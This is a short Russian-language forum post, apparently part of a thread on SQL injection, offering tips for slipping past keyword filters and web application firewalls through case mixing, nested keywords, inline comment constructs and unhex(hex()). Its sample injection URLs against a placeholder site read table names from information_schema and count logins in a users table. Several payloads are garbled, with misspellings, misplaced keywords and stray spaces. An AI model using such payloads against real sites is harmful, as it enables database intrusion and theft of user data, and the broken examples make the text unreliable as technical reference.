Немного добавлю :
- при фильтре, допустим, SELECT: варианты SeleCt, seleSELECTct;
- для обхода некоторых фильтров WAF может помочь конструкция /**/, например:
code:
http://site.com/index.php?id=1/*+select+union+table_name+from+infromation_schema. tables*/--+
либо
code:
http://site.com/index.php?id=1/*!12345+select+union+table_name+from+infromation_s chema.tables*/--+
Конструкция unhex(hex()) может помочь при чтении данных в какой-нибудь нестандартной кодировке, если при обычном запросе у вас выводятся кракозяблы.
code:
http://site.com/index.php?id=1+select+union+unhex(hex (table_name))+from+infromation_schema.tables--+
Полезна функция count(), позволяющая определить количество записей в определенной строке, например, запрос
code:
http://site.com/index.php?id=1select+union+count(login)+from+users--+
даст нам информацию о количестве записей в строке login из таблицы users